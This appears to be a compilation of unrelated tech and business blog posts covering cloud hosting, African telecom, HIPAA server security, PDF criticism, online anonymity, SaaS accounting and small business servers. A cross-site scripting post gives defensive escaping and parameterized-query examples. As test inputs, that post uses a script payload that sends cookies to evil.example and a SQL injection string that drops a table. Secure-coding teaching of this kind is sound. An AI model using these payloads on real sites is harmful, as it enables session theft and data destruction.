Designed to consolidate security processes, increase operational flexibility and deliver built-in backup and data protection for today’s business, Cloud Hosting features full compliance with stringent regulatory requirements including HIPAA, Sarbanes Oxley and PCI and is hosted in CoreVault’s own SAS 70 Type II facility. The new solution is available as an Individual Service for small-and-medium-sized businesses (SMBs) that only need a single virtual machine and as an Enterprise Service for larger-scale companies that require a more powerful package of resource options.

“We are pleased to build upon the value of our partnership with VMware to offer one of the most secure, flexible and efficient cloud computing environments available,” said Jim Rutherford, President, CoreVault. “By matching industry leading technology with our years of data protection and disaster recovery expertise, CoreVault has perfected cloud computing so that today’s businesses can remain more agile without worrying about business continuity or security.”

The CoreVault Cloud Hosting service offers multiple advantages for companies both large and small, including:

  • High Performance with minimized risk and maximized security.
  • Easy deployment that virtually automates infrastructure virtualization with instant scalability.
  • Built-in backup.
  • Cost savings that benefit the bottom line by reducing capital expenses.
  • Flexibility to access applications and data from anywhere at any time.

The Cloud Hosting service leverages the latest VMware technology, including VMware vCloud Director, which enables the delivery and consumption of multi-tenant private and public clouds. CoreVault provides backup, recovery and hosting services to customers nationwide. Its services are endorsed by professional associations in the legal, healthcare and financial services industries representing over 500,000 business professionals.

Cloud Hosting services are now available. For more information, please visit:

http://www.corevault.com/hosting_in_cloud_solutions.

Follow CoreVault at http://twitter.com/CoreVault

About CoreVault

CoreVault is a Cloud solutions company that provides backup, recovery and hosting services to businesses in more than 37 states. Your data is securely and automatically stored off-site in our privately owned, SAS 70 Type II certified facilities. It is accessible 24/7 with monitoring and support provided by certified experts. Built on VMware’s industry leading technology, Cloud Hosting services are available on an individual or enterprise-level basis. CoreVault is recommended to more than 500,000 business, legal and healthcare professionals across the country by more than 25 associations. You run your business while we provide elite protection and hosting of your data and reputation. For additional information, go to corevault.com.

VMware and VMware vCloud are registered trademarks and/or trademarks of VMware, Inc. in the United States and/or other jurisdictions. The use of the word “partner” or “partnership” does not imply a legal partnership relationship between VMware or any other company.

Penetrating the African Mobile Market

Smartphones, 3G wireless connectivity and downloading various apps to your cell phone are all the rage in today’s world. These advanced technological devices can be found in the pocket, on the belt or in the purse of men and women residing in growing mobile markets like those in the U.S., China, India, Europe and Africa.

Seeing Africa’s Potential

In early 2001, Connectiva Systems recognized the potential of the African telecom market. We believed it would become a leading mobile marketplace and began to explore opportunities. Our foresight was on target; from 2000 through 2007, Africa’s telecom sector boasted an average annual growth rate of 40 percent while investment grew 33 percent.[1]

Furthermore, increased affordability of mobile phones combined with higher consumer spending power catalyzed much of the region’s telecom growth. Since 2000 alone, Africa has gained 316 million new mobile phone subscribers,[2] virtually skipping the computer era and entering the age of mobile. From mobile banking to complex data services, operators were addressing the changing needs of their subscribers while at the same time generating new revenue streams.

Finding the Means to Penetration

Understanding this context, we entered the African market through our client Zain and its subsidiaries in the region, as well as in the Middle East. Focusing our energy first on Zambia, Kenya and Nigeria, we have since expanded into more than 25 other MENA (Middle East and North Africa) countries including South Africa, Egypt, Uganda, Morocco, Tunisia and the Democratic Republic of Congo.

We quickly discovered that African telecom companies experienced 20 to 25 percent revenue leakage and did not have the internal expertise to manage their revenue streams. To bridge this gap, we developed a customized portfolio of managed services for revenue assurance.

Our goal was to sell outcomes and solutions, not just the technology. We focused on creating and structuring solutions for Africa that fulfilled the continent’s unique, local needs, keeping the growing number of mobile phone users in mind.

While working with African countries, Connectiva Systems has learned that:

  1. 50 percent of African families are unbanked and keep their money under a mattress at home. Telecom operators were fast emerging as preferred providers for mobile financial services so Connectiva Systems created solutions that addressed needs around mobile banking analytics.
  2. Africa is not the type of place where you can sell and walk away. It needs local marketing, local relationships and sustained engagement. Connectiva Systems hired local employees with a strong understanding of the cultural nuances in business, instead of flying staff from Europe or India to Africa.
  3. Relative to developed markets, the quality of service (QoS) is still poor and operators require solutions that measure QoS and negative customer experiences. In turn, Connectiva Systems launched solutions that enable operators to understand the end-to-end customer experience, such as number of dropped calls, latency in downloads as well as helping the operator provide consumers with special offers they will want to leverage.
  4. Operators need a much higher level of hand-holding and support as they do not have the internal staff and expertise to manage such systems. Connectiva Systems created tailored managed services offerings for Africa that allowed operators to successfully outsource all their operational analytics activities to the company.

Continued Mobile Growth

Growth is not without its challenges. To succeed, providers must understand the challenges of local operators and subscribers, working to meet their specific needs. But it’s an exciting time in Africa. The continent is on its way to reaching 100 percent mobile penetration within the next five years, and Connectiva plans to be part of it, every step of the way.

About the Author: Avi Basu is the CEO of Connectiva Systems. Headquartered in New York and with offices around the world, Connectiva has won numerous awards and has been consistently recognized as a thought leader in revenue management.

 

[1] “Africa Calling,” Zakir Gaibi, Andrew Maske, and Suraj Moraje, McKinsey & Company, August 2010

[2] “Lions on the Move: The Progress and Potential of African Economies,” McKinsey Global Institute, June 2010

The Importance Of Physical Server Security For Privacy Protection (HIPAA, HITECH, PII, PHI)

The doctor insisted on knowing our physical security arrangements.  We explained that our servers run in a building designed for securing telecommunications equipment and staying online 24/7 with battery backup and powerful generators.  We shared that the building required electronic key cards to enter, that security cameras monitored who accessed the building, and that the cage required an actual key to unlock and enter. We closed by saying that all keys were under the control of our infrastructure coordinator and had to be checked out before leaving his office.

At this point, we smiled and pointed to his server, and asked how his security compared to that.

The server sat under the reception counter, ten feet from the front door.  Even more troubling: the admin password for the server was taped to the side of the box, since the server needed rebooting every few days and the doctor felt the IT professional was too expensive to bring out every time.  While this is an extreme example, it highlights a serious issue affecting small healthcare businesses: how to physically safeguard data without spending huge sums of money.

HIPAA and HITECH both have compliance exemptions for small practices.  But, and this is an important but, those exemptions only protect covered entities as long as they follow “best practices”.  In this situation, the doctor likely could not fall back on the small practice exemption because no safeguard existed to protect the server.  Compromised data could result in penalties and public exposure costing the practice money and patients.  The small practice exemption is both a blessing and a curse: It can keep doctors from spending money with no real payback, but it means that the risk doesn’t go away if reasonable steps are not taken.

What can a small practice do to enhance physical security without spending a large sum of money? To begin, everyone must appreciate that the server itself is not the target; it is the sensitive information on the server someone wants.  Best practice for hosting an on-premise server means keeping it out of high-traffic areas and limiting server access to a select few.  It may require retrofitting an area in the back of the office to offer a secured area to house the server.  An electrician will likely have to reroute network cables to this new room, and HVAC technicians may need to put in a new cooling vent to keep the room at the proper temperature.  As you can see, costs begin to mount when physically securing the server becomes important.  Unfortunately, the small healthcare practice often overlooks server security when designing the office. What other alternatives exist?

The practice can evaluate the physical security strengths of renting its own space in a facility designed to run and protect computer equipment.  With this approach, the doctor has the benefit of sharing the facility cost with other businesses using the site, but now someone has to travel to the building to handle server issues that arise.  While physical security increases, so too does the cost of managing technical and administrative security.

The practice can also look at a complete off-premise solution to securely host their applications, store data, and provide secured access to users anywhere.  A service like this, whether vendor-based Software as a Service, or a virtual desktop like that delivered by Argentstratus, uses sophisticated security measures and then shares that cost with all users of the system. This approach reduces the cost of physical security to pennies an hour and frees the practice to use the space for treatment instead of storage and security.

Information security starts with making sure people cannot get easy access to the server.  This comes at a cost to the practice.  To house equipment on-premise requires giving up treatment rooms for server rooms.  To move off-premise will require the doctors to know and trust the service provider and insist on practice-centered Business Associate agreements, but in the end, the risk of data loss is real.  Knowing this and dealing with it early will allow the practice to adapt and create best practices that allow doctors to practice medicine, not IT.

About The Author: John Caughell is the Marketing Coordinator for Argentstratus. They are leading experts in the field of cloud technology for the medical industry. If you have any concerns about privacy and security for PII or PHI in the cloud, get in touch with them.

Graphic Design and Text – You’re Doing It Wrong (Stop Adobe Acrobat Abuse)

I have been reading a lot of commentary on “Human Computer Interaction” and “Information Design” recently. In the process, I discovered that the HCI community has come across an idea that is apparently not well known to information designers: defining the markup of a document to match the semantics (the semantic structure of the document) makes it easier, and more effective, to apply formatting to the document.

Well, duh!

How in the name of all that’s holy did this basic principle of document design ever fall out of your understanding?

Typographers and book designers were discussing this concept 100 years ago. I have books published 80 years ago that elaborate on the idea and its implementation in great detail.

Moving a little closer to home, Standard Generalized Markup Language (SGML) — the ancestor of HTML and XML — grew out of the understanding, by computer professionals working in the printing and publishing industry forty to fifty years ago, that:

Markup should encode the semantics of a document – formatting should be applied by assigning styles to the semantic elements

I suppose I should assign much of the blame for the loss of this insight to Adobe.

When Adobe introduced Acrobat, my immediate reaction was utter hostility. You see, Acrobat was originally developed with a very simple, narrow focus: it was to be a way to transmit formatted documents from designers to printing companies in a completely faithful way. The printing company, using equipment and software from a wide variety of vendors, could process the received PDF document and be confident that the results would be exactly what the customer was expecting.

However, Adobe’s management saw that the page images displayed on their computer equipment were also quite faithful to the designer’s product, and probably decided that this was far more important than the readability of the resulting documents. Therefore, it seems that Adobe began marketing Acrobat as the best tool to produce documents to be read on computers.

This is a completely different purpose than faithfully transmitting documents to printers!

In the process, Adobe ignored a few minor details.

Document designers were (and to this day still are) designing their documents to be printed — typically on letter size (8.5 inch by 11 inch) or A4 size (210 millimeters by 297 millimeters) paper, oriented with the long side vertical (what we call “portrait mode”). Computer screens are almost always configured in a “landscape mode” — with the short side vertical. In addition, the resolution available on computer screens was vastly inferior to the resolution of a printed document (Twenty-five years later, that is still true, but less so). This led to some “interesting” results:

  • A document of simple format — with a single column of text spanning the width of the page — could not be read at all when the entire page width was displayed across the screen. The number of pixels available for each character was so small that normal text was completely illegible (character glyphs like “a” versus “e” versus “o”, or “n” versus “u”, were indistinguishable).
  • The same document, when enlarged sufficiently to make the text legible, required scrolling the view horizontally at least twice for each line of text (one or more times to advance to the next portion of the line, then an equal number of times to return to the beginning of the next line). This so completely interrupted the reading process as to make the document unintelligible.
  • A document of more complex format — for example, with two or more columns per page — could be readable “in detail”, but not “in bulk.” Again, the reader was forced to reverse the direction of vertical scrolling at the end of each column to return to the top of the page, and then to scroll horizontally to the next column; at the end of the last column on the page, the reader was forced to scroll horizontally (in the reverse direction) to get the first column of the next page.
  • In many cases, illustrations were illegible when the view was set to make text legible, and vice versa. The reader was forced to change scale, and adjust the position of the view, for each reference to an illustration.

Let’s contrast these disabilities with the experience of reading a properly formatted document in a Web browser, or other properly designed tool such as the various hypertext readers available when Acrobat was introduced:

  • Because document contents were encoded with structural markup, and formatting was encoded separately, the document delivery tools, consisting of the hardware and software, could apply some judgment to the rendering of the document. In particular, text could be flowed into the available display area, so that text in a legible size and font could be read as a continuous, connected stream (the only user interaction being to scroll continuously in a single direction).
  • The rendering system could also make appropriate decisions about rendering illustrations, so images could be presented at a scale that provides legibility and readability while the text was also presented legibly. The reader could absorb both text and illustrations without constantly changing the view.

Now that electronic books (E-books) have become popular, many people have experience with document rendering systems that work properly (that is, they render the document to fit the dimensions of the display, rather than attempting to fit an arbitrarily rendered document into a display of completely different configuration), and Acrobat is finally being seen for the impractical headache it has always been.

Yet, most “graphic designers” still don’t get it! Most designers still seem to think that their purpose is to make the document, or Web site, or whatever they are asked to present, “look good,” and that a pleasing design is more important than the contents.

One more time:

Information design is about delivering information. It's not about making it look pretty; it's about representing the structure to improve communication.

I recommend that anybody who is, or who aspires to be, doing graphic design for a document or Web site find a copy of The Crystal Goblet: Sixteen Essays on Typography by Beatrice Warde (my copy was published by The World Publishing Company in 1956). Ms. Warde wrote very clearly, and the title essay (which can also be found online) expresses this key point very, very well.

There is plenty of room for a graphic designer to add value to a document or Web site, but he or she should achieve that goal by making the document do a better job of communicating the author’s message. When the graphic design becomes the primary function of a Web site, with the contents assigned some lesser role, it does a disservice to the reader (the consumer of the information), and an even bigger disservice to the writer (the publisher of the information). Yet virtually all Web sites, and far too many documents, are designed to achieve a “look and feel” first, and to communicate the information content second.

Using nothing more than HTML coding and cascading style sheets, it should be possible to construct Web pages that:

  • Take advantage of the full width of the window in which they are rendered (rather than limiting the display to some arbitrary number of pixels that serve as a lowest common denominator of acceptable displays)
  • Organize information by allotting space according to the amount of text (using tables with column widths defined as percentages of the page width)
  • Flow text around illustrations and other inserts (without imposing fixed positions on either the text or the insertions)
  • Represent the structure of the information by using paragraph styles (such as different heading levels, different kinds of lists, various kinds of emphasis, and the like), while allowing the particular Cascading Style Sheet (CSS), selected by the user from among those appropriate for the rendering environment, to define the specifics of fonts, sizes, justification, and so on.
  • In fact, encode Web pages that can be delivered on platforms as different as large, high-resolution desktop displays, even larger but comparatively low-resolution displays (such as living room television sets), and tiny mobile displays (such as smart phones) from a single source file, by changing only the CSS (a minimal sketch follows this list).
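To make that concrete, here is a minimal sketch of structure-first markup whose appearance is controlled entirely by a swappable stylesheet. This is an illustration, not a production page; the class names and the 40em breakpoint are arbitrary choices of mine.

```html
<!-- Minimal sketch: semantic markup carries the meaning, and the CSS (which
     could be swapped per device) carries the look. Class names and the 40em
     breakpoint are arbitrary choices for illustration. -->
<article class="story">
  <h1>Headline</h1>
  <p>Body text flows to fill whatever width the reader's window provides.</p>
  <img class="figure" src="chart.png" alt="Quarterly results chart">
</article>

<style>
  .story         { width: 100%; }   /* use the full window width */
  .story .figure { float: right; max-width: 40%; margin: 0 0 1em 1em; }
  /* On narrow (e.g. phone) displays, let the figure span the full width */
  @media (max-width: 40em) {
    .story .figure { float: none; max-width: 100%; margin: 1em 0; }
  }
</style>
```

The same source file reads comfortably on a desktop monitor, a television, or a phone; only the stylesheet decides how it is laid out.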

I am dedicating my efforts to educating the document publishing community (including Web designers) about this simple but inexpressibly powerful concept: put the Information first, and the Appearance second.

About The Author: Michael Meyers-Jouan has extensive experience in the software development and graphic design industries. He is also a prolific contributor to IT Toolbox. You can reach him through his profile here.

21 Legitimate Arguments And Scenarios Where Online Anonymity is Required

In most developed nations, people should, ideally, have freedom of expression and the right to air their views without fear or favor. Since the Internet is now the primary means of communication for many groups, with people using email, social networking websites, web browsing, newsgroups, etc. to communicate, the freedom and protection of online speech and communications is increasingly becoming a major human rights issue.

Of course, online communication provides an easy, automated, inexpensive, nonviolent way for governments, companies and spies to track the activities of careless online users. That's why it's important to cover your tracks using the right tools (proxy servers, Janus, Tor, VPNs, etc.).
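As a concrete illustration of one of those tools, here is a minimal sketch of routing a web request through a locally running Tor client from Python. It assumes Tor's SOCKS proxy is listening on its default port 9050 and that the requests library is installed with SOCKS support (pip install "requests[socks]"); the URL is just a placeholder.

```python
# Minimal sketch: send a web request through Tor's SOCKS proxy instead of
# connecting directly, so the destination site sees a Tor exit node's address.
# Assumes a local Tor client on its default port (9050) and that requests is
# installed with SOCKS support: pip install "requests[socks]"
import requests

TOR_PROXY = "socks5h://127.0.0.1:9050"   # socks5h = resolve DNS through Tor too

def fetch_anonymously(url: str) -> str:
    proxies = {"http": TOR_PROXY, "https": TOR_PROXY}
    response = requests.get(url, proxies=proxies, timeout=30)
    response.raise_for_status()
    return response.text

if __name__ == "__main__":
    # example.com is just a placeholder destination
    print(fetch_anonymously("https://example.com")[:200])
```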

Of course, people on the anti-privacy side of the argument will tell you “If you’re not doing anything wrong, you have nothing to hide”. However, that’s not how the world works.

Below, I've included 21 completely legitimate and legal scenarios in which online anonymity is critical.

  1. Online anonymity is an important tool in the prevention of online threats, malicious attacks, and identity theft. When we browse the Internet, search engines and ISPs automatically record our browsing activity. These logs are often either sold to online marketers or hacked by identity thieves, resulting in our personal data being exposed to unscrupulous parties. At times, we research sensitive information, intentionally or unintentionally. In all of these circumstances, we require online anonymity.
  2. Journalists are increasingly required to communicate with prisoners or people under surveillance in countries – like China – that have repressive regimes. Unless the journalists and the people they contact have the protection of anonymity, those contacts could face serious consequences from such regimes. They need online anonymity to avoid retaliation and report the situation on the ground openly.
  3. With the recent high-profile security breaches involving LulzSec, Anonymous and Wikileaks, it's clear that we can't trust governments and large organizations to protect our personally identifiable information.
  4. Law enforcement officers use online anonymity when investigating questionable or illegal websites, conducting online undercover operations, and receiving anonymous tips from informants about criminals or terrorists. In these situations, the law enforcement authorities and their contacts need online anonymity for the successful completion of the investigation. If suspects become aware that they are being tracked, it could hamper the investigation.
  5. Military communications require maximum security. Today's Internet hackers are sometimes able to crack or decipher encrypted communications, and even with secure encryption, a lot of information can be obtained from the packet headers alone. Hence, military commanders, officers, and field agents use anonymity. The threat posed by insurgents and terrorists has increased enormously in recent times, and military personnel require anonymous communications to protect themselves and their strategies from attack. A recent example was the killing of Osama Bin Laden by U.S. special forces, where all communications were kept behind a veil.
  6. National intelligence agencies collect huge volumes of data on persons suspected of corruption, bribery, tax evasion, illegal activities, and exchange of information and documents of national interest. If the suspects became aware of the surveillance, they could easily take evasive action and escape prosecution. Hence, intelligence agencies usually resort to anonymous surveillance of such persons.
  7. Human rights activists and groups generally use online anonymity to escape unwarranted prosecution or harassment, even though their activities are legitimate. In countries like China, activism is brutally suppressed, and hence most human rights activists there resort to online anonymity to protect themselves.
  8. Labor unions have the right to organize workers. Still, management or government agencies may try to disrupt their efforts. Under such circumstances, labor unions and workers use online anonymity to organize and unite.
  9. Whistleblowers are another group that requires legitimate online anonymity. Whether they work for corporate business entities or governmental agencies, they could face personal harm and other repercussions if their identity became known.
  10. Vulnerable businesses make anonymous communication channels available to help their employees inform the management about activities by their coworkers that could harm the business.
  11. Companies often monitor the activities of their employees to identify those who view unapproved material or visit job search sites on the Internet. Online anonymity is important for the protection of employees' privacy and information access rights.
  12. Many bloggers use online anonymity to escape legal suits for what they express in their blogs.
  13. ISP network outages, DNS problems, and routing problems can make sites unreachable through your usual path. Online anonymity tools, such as proxies, can sometimes provide an alternate route in such circumstances.
  14. Informants who provide vital data on sweatshops and illegal organizations can also face danger to their lives. Such people use online anonymity to protect themselves.
  15. Lawyers with prestigious clientele could offend their clients if they express their political ideologies openly. Hence, they write on blogs anonymously, hiding their real identity.
  16. Social workers often need to protect vulnerable citizens from unscrupulous parties who try to exploit them. In such situations, they require anonymity both to achieve their goals and to protect themselves.
  17. Financial institutions participate in securities clearing houses on a daily basis. They use online anonymity to safeguard their data, since a breach at one financial institution could compromise data security across the board.
  18. Many organizations shield their pricing from competitors. If you wish to view a competitor's prices, you may need to visit their website anonymously, as a member of the general public would.
  19. Investment bankers protect their investment decisions by operating anonymously and escaping from snoopers.
  20. Many online marketers use anonymity to conduct marketing operations so that their competitors are not alerted about their strategies.
  21. Since search engines modify their results based on a number of personally identifying criteria such as location, web browser, cookies, operating system, etc., online anonymity can help ensure that you get access to accurate, unfiltered web search results.

When The IT Department Gets In The Way Of Technology

I think IT workers make terrible gatekeepers, so it's unwise to allow IT workers to dictate what technologies cannot be used within a company. Yet this is how traditional IT departments work within most companies: the IT workers specify what computers to buy for the staff, issue cell phones and other portable devices based on perceived need, and decide what kinds of software everyone in the company must use for official work.

But with the personal portable device revolution firmly underway, we're already seeing the fallout: employees are buying their own technology, and they're bringing it into work, expecting to use it. IT workers often want to tell employees to leave their Androids, iPhones, iPads and everything else at home. Employees must use only BlackBerries at work, they might say, so that the IT staff can remain in control of the network and, by extension, the company's information.

But when CEOs started showing up at work with these devices, the dynamic had to change. The suits didn't care what the IT staff thought about their new toy's security. They wanted to use it, and the responsibility fell to the IT staff to make sure it was done safely. Lots of IT managers grumbled, and I've read numerous reports of companies actually banning employees from bringing iPhones into the office.

But what’s to stop an attacker from bringing a banned device within range of your wireless network? Is your network still safe? Is it safe to assume that since you’ve banned a device from employee use, that it won’t mysteriously appear on the network anyway? It’s like burying your head in the sand and thinking that you’re never going to need sunscreen.

I’ve often espoused the idea that IT workers are performing a service on behalf of their coworkers. At their best, they are trusted advisors and troubleshooters, people who help their coworkers adopt new technologies, expanding the company’s capabilities, internal tech savvy and lateral decision-making capacity.

Ideally, IT workers would be advising employees on safe computing practices, strong passwords, reliable backups, remote wipe capability, etc. But more often, IT workers are too busy to do this; instead, they're waging a holy war against unapproved employee choices, obstructing how their colleagues use technology at work.

Vital aspects of security must be maintained, that goes without saying. But when IT acts like a petty tyrant, it doesn’t help the company, the employees, or ultimately the IT workers either. Usually there’s a way to incorporate new technologies without incurring massive new risks. Being capable and willing to do what’s necessary to make that possible should be a primary consideration when hiring a new IT worker.

About The Author: Troy Davis is CTO of CoupSmart, a fast-growing coupon system that leverages the power of social media.

Make Your Users Aware of Cross-Site Scripting

Typical phishing attacks are fairly easy to catch. Antivirus companies are constantly on the lookout, and they have “honeypot” email accounts that exist solely to collect as much spam as possible.

When a phishing site is located, it is automatically blacklisted… usually within minutes. A red flag goes up and the signal ripples around the world within seconds. And when your users go to click the link, BANG! A big red warning, saying that this site has been blocked.

But hackers are wise to this game, and they’ve come up with new solutions. One such technique is through the use of something called “Cross-Site Scripting”. In essence, cross-site scripting occurs when a hacker is able to embed a piece of code into another web site. Take a look at the following video to see what I mean.

Yeah… he placed YouTube inside of another web site. So what’s the big deal?

Well, what if – instead of inserting a web page into this site – he inserted a fake login/password form? Since this is a legitimate web site, it would be difficult for antivirus companies to block the phishing attack without blocking the entire legitimate web site.

And for an end-user landing on this page, it would be very difficult to tell the difference between the fake site and the real one, since they’re both hosted on the same domain.

These types of attacks are caused by lazy coding, and I predict that the current state of the economy will increase the frequency of cross-site scripting attacks.

Companies looking to save money are outsourcing their custom coding to off-shore programming houses. And in order to charge the cheapest possible rates, these companies want to ship products out the door as quickly as possible. For this reason, form input is rarely checked… if at all.

I’ve personally had to deal with off-shore programmers on a number of projects, and found that security is very low on the priority list. When I come back with a bug list, they push back hard. In my experience, these companies are more interested in billing on a “per-project” rate than working on an hourly schedule.

And resistance also comes from within your own company. In order to maximize ROI, managers want to ship as early as possible, even if the final product isn't 100% ready yet. For them, shipping on time can be a matter of personal reputation, and they'll be ready to cut a few corners and risk an "it'll never happen to me" scenario.

That's why you need to have somebody you trust look over all of the code before it ships, and make sure that all user input is properly validated.
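Part of that review is checking that anything a user typed is escaped before it is echoed back into a page. Here is a minimal sketch in Python using only the standard library; the function name and the HTML snippet are mine, not from any particular framework.

```python
# Minimal sketch of output escaping: never echo raw user input back into HTML.
# html.escape() converts <, >, &, and quotes into harmless entities, so an
# injected <script> tag is displayed as text instead of being executed.
import html

def render_comment(user_input: str) -> str:
    safe_text = html.escape(user_input, quote=True)
    return f'<p class="comment">{safe_text}</p>'

if __name__ == "__main__":
    attack = '<script>document.location="http://evil.example/?c="+document.cookie</script>'
    print(render_comment(attack))
    # -> the tag is rendered inert: &lt;script&gt;...&lt;/script&gt;
```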

And there are other risks that come when users are able to enter whatever input they wish.

  • Some embedded code can steal cookie information when an administrator logs in, and this could be used to gain administrator access.
  • In a worst-case scenario, a hacker could enter code that runs SQL commands against your database and takes over your site (see the sketch after this list).
  • Visiting a perfectly valid and trusted site could trigger a malicious file download.
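The SQL risk in particular is usually closed by using parameterized queries rather than gluing user input into SQL strings. A minimal sketch with Python's built-in sqlite3 module follows; the table and column names are invented for illustration.

```python
# Minimal sketch of parameterized queries: the database driver treats user
# input strictly as data, so "'; DROP TABLE users; --" cannot alter the query.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, email TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'alice@example.com')")

def find_user(name: str):
    # BAD:  conn.execute("SELECT * FROM users WHERE name = '" + name + "'")
    # GOOD: let the driver bind the value as a parameter
    return conn.execute("SELECT * FROM users WHERE name = ?", (name,)).fetchall()

print(find_user("alice"))
print(find_user("'; DROP TABLE users; --"))   # returns [] instead of running SQL
```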

And fixing your own code isn’t enough. The real problem with cross-site scripting is that it can come from any legitimate site on the internet. Even mega-sites like YouTube and Reddit aren’t immune to this type of hacking.

For this reason, you want to make your end-users aware that this type of code can lurk in otherwise legitimate sites. Advise them to always type domains in manually, and never to trust login links sent via email. And if they see funny activity on a web site – such as an unexpected popup – they should contact IT to have it looked at.

No, Thanks, I won’t be Buying Any PDF eBooks or Downloading any PDF Whitepapers

You can find almost any information on-line these days. Of course, it’s a struggle searching the Internet for it, and most of it’s not particularly readable – and then you never know if it will be there in another week… So there’s still a market for “packaged” information. You know, what we used to call “books.”

I just wish that all of you who want to package information in electronic form would find a better format than the Adobe Portable Document Format (the infamous “PDF” or Acrobat file). I’ve suffered so much, with so many PDF files, and I just refuse to actually pay for such an awful medium.

I suppose I should explain my antipathy to the PDF file. The fundamental issue is that it solves the wrong problem.

You see, when Adobe first developed the Portable Document Format, their immediate goal was to provide a common format that could be used to transmit publications to commercial printers. This made it possible for graphic designers using “desktop publishing” tools to have complete control over the design and appearance  of printed documents, regardless of which applications they used to create the documents, and regardless of what typesetting or imaging equipment the commercial printer used. This was a wonderful idea, and PDF is an excellent tool for this purpose.

Unfortunately, the people at Adobe seem to have lost sight of the primary purpose of distributing documents — to communicate information. They began a campaign to make PDF the standard for the electronic distribution of documents. In doing so, they focused their marketing on the graphic design community, telling their customers that using PDF would enable them to create documents once, distribute them in any medium, and be able to ensure that all readers would “see the same design.”

That is, indeed, the result. When a document is made available electronically as a PDF file, the user is forced to deal with a document that was designed for a different medium, and that is in a terrible format for use in any electronic display.

To begin with, virtually all documents are being created to a standard page size, in a “portrait” orientation. This doesn’t work very well when virtually all electronic displays are in “landscape” format (except those in handheld computers — but I’ll get to that a little bit later).

Furthermore, when a document is designed for printing on a letter-sized page, it takes a pretty high resolution display to be able to render the entire width of the document legibly. I realize that’s not quite as serious as it was when Adobe first introduced Acrobat Reader (when an 800 by 600 display was still “high resolution”), but it can illustrate the overall problem very clearly: try setting your screen resolution lower (for example, to 640 by 480) and then try to read a letter-sized document in Acrobat Reader. In order to make the characters large enough to be legible, you have to zoom to a point where you can’t see the entire text line at once. Therefore, you have to scroll horizontally in both directions for every line of text you read!

Contrast this to the effect of opening a document in a “structured” format, such as SGML or HTML, in an appropriate reader (such as your Web browser). The reader formats the document, on the fly. The document is formatted to the screen. Therefore, the line breaks fit the available space, and you can read the document continuously. The document is formatted with text sizes that fit the display. Therefore, the text is legible (if your eyesight is limited, you can tell the reader to use larger sizes, and everything will be enlarged proportionately).

In particular, if you open the same document in two different readers, on two devices with very different characteristics, each reader will format the document to the available display. For example, use the Kindle Reader software on your desktop computer, and open an e-Book. Then open the same e-Book using Kindle Reader on a smart phone. You’ll be looking at very different line breaks, and very different page numbers, but in each case the document will be clearly legible and easily readable.

Adobe has done us all a great disservice by persuading so many people to use PDF as their format of choice.

About The Author: Michael Meyers-Jouan has extensive experience in the software development and graphic design industries. He is also a prolific contributor to IT Toolbox. You can reach him through his profile here.

Top 20 SaaS Accounting and Cloud Bookkeeping Online Software Reviews

When I was in college, I supported myself by starting my own small business on the side. I still remember collecting all of my receipts and business documents in a plastic bag, and then handing everything off to my bookkeeper at the end of the year.

That was so dumb. If anything happened to that bag, my business would’ve run into some serious problems.

But that’s no longer the case today.

Today's businesses have access to a wide array of online, electronic bookkeeping applications that make this job far simpler. Especially within the past few years, we've seen a number of important technological advancements that have made bookkeeping easier:

  • Credit card transactions can be automatically added to the books.
  • You can use a camera phone to upload a receipt.
  • You can collaborate with business partners through a single application.

Bookkeeping is so much easier now than it’s ever been before. Even if you don’t understand accounting, you can still manage your own books.

Below, I’ve compiled a list of the top 20 online bookkeeping applications that are available from a Software-as-a-Service delivery model.

  1. Zoho Books – Zoho Books is ideal accounting software for small businesses. It's easy to use, and lets you share and collaborate effortlessly. And since it's part of the Zoho suite, you know it's a solid system.
  2. Outright – The automated approach to bookkeeping. It lets you say goodbye to old-fashioned accounting.
  3. Kashoo – Kashoo helps you become more organized while also saving you money on accounting fees with their collaborative, tablet-friendly accounting software.
  4. Pavintheway – Manage your entire company from this full-featured robust online accounting package.
  5. Clear Books – Time-saving online bookkeeping software that’s in use at thousands of British companies.
  6. Accounts Portal – Manage your entire business from a single handy and easy-to-use accounting system.
  7. Yendo – With a Web 2.0 approach to finance, Yendo plays nicely with mobile devices and third-party cloud services.
  8. Xero – This is an incredibly easy accounting application that makes finance a pleasure.
  9. Netsuite – Good friends of the blog. This fast-growing company offers CRM, accounting, ERP and ecommerce software… all from a single source, and all from the cloud.
  10. NolaPro – Allows you to create your own online accounting site, or rent the hosted version directly from them.
  11. Merchant’s Mirror – This is the next step in the evolution of online small business accounting software.
  12. Envision Accounting –  An online accounting suite that’s specially designed for project-driven companies. Incorporates accounting and project management into a single suite.
  13. Quickbooks Online – QuickBooks is one of the best-known and most trusted brands in accounting. And this is their hosted online product offering.
  14. Wave Accounting – Easy to use with a high degree of automation. Get your accounting out of the shoebox, and into this simple, well-organized, secure solution.
  15. Skyclerk – Skyclerk offers dead simple accounting that’s elegant, reliable and secure.
  16. Perfect Books – Spend more time focusing on your business with the help of this free, paperless and automated online bookkeeping application.
  17. Financial Force – A cloud-based financial suite that’s affiliated with SalesForce and UNIT4.
  18. Freeagent Central – A stress-free online bookkeeping service that’s used every day by thousands of companies.
  19. Less Accounting – Less Accounting believes that accounting should be easy. Why do more accounting when you can do less accounting?
  20. Intacct – Award-winning accounting software that’s used by over four thousand organizations.

Do you see one that I missed? Would you like to share your experience with one of the companies I’ve mentioned? Leave a comment below and share your thoughts.

Are We Seeing The Death Of The Small Business Server?

The doctor is adamant. She wants a managed service agreement with a maximum 15-minute response time and a guarantee that her office will be up and running in under 30 minutes if the server goes down. This seems unrealistic, but in a world where even the smallest business has a centralized server to host applications and store data, the inability to stay connected can cost a business thousands in revenue.

She is not alone. Decision-makers in every type of enterprise are beginning to worry about how they will work if their server goes down. Even though hardware costs continue to drop, server set-up and management is becoming increasingly expensive. IT professionals continue to offer technical solutions to the risk of downtime by adding more disk drives, mirroring technology, swappable drives, and remote monitoring software; but all of this simply pushes the cost of technology even higher.

These technological solutions, however, do not eliminate downtime.  To be fair, they reduce the risk of lost data in the event of catastrophe, but they do not keep the enterprise server online.  The only certain way to keep the hosted applications online and the data accessible is through complete redundancy.  But, if costs are already too high, hardware and software redundancy simply pushes the cost of complete accessibility out of reach.

This is the dilemma facing business decision-makers and computer manufacturers alike.  Centralized servers have become so essential to business that any amount of downtime puts the business at risk.  The IT dream solution is to increase the cost and complexity of on-premise systems to keep systems online.  The economic reality is that enterprises must find a way to have greater access without increasing their investment in IT infrastructure because they are already spending too much money on equipment they are not fully utilizing.

